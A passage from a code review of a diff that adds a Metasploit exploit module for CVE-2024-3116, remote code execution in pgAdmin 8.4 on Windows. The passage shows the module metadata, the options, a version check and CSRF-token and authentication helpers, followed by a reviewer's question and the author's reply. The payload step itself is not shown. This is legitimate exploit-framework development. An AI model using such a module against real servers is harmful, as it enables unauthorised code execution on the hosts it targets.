modules/exploits/windows/http/pgadmin_binary_path_api.rb

```diff
@@ -0,0 +1,228 @@
+          allows attackers to execute arbitrary code on the server hosting PGAdmin,
+          posing a severe risk to the database management system's integrity and the security of the underlying data.
+
+          Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'M.Selim Karahan', # metasploit module
+          'Mustafa Mutlu', # lab prep. and QA
+          'Ayoub Mokhtar' # vulnerability discovery and write up
+        ],
+        'References' => [
+          [ 'CVE', '2024-3116'],
+          [ 'URL', 'https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/'],
+          [ 'URL', 'https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116']
+        ],
+        'Platform' => ['windows'],
+        'Arch' => ARCH_X64,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2024-03-28',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'Reliability' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ],
+          'SideEffects' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8000),
+        OptString.new('USERNAME', [ false, 'User to login with', '']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/'])
+      ]
+    )
+  end
+
+  def check
+    version = get_version
+    return CheckCode::Unknown('Unable to determine the target version') unless version
+    return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5')
+
+    CheckCode::Vulnerable("pgAdmin version #{version} is affected")
+  end
+
+  def set_csrf_token_from_login_page(res)
+    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
+      @csrf_token = Regexp.last_match(1)
+    # at some point between v7.0 and 7.7 the token format changed
+    elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)
+      @csrf_token = element['value']
+    end
+  end
+
+  def set_csrf_token_from_config(res)
+    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
+      @csrf_token = Regexp.last_match(1)
+      # at some point between v7.0 and 7.7 the token format changed
+      # pgAdmin['csrf_token'] =
+    else
+      @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first
+    end
+  end
+
+  def auth_required?
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)
+    if res&.code == 302 && res.headers['Location']['login']
+      true
+    elsif res&.code == 302 && res.headers['Location']['browser']
+      false
+    end
```

Comment:
What if the two conditions didn't match? Is authentication required then?

Reply:
There are only 2 cases I've observed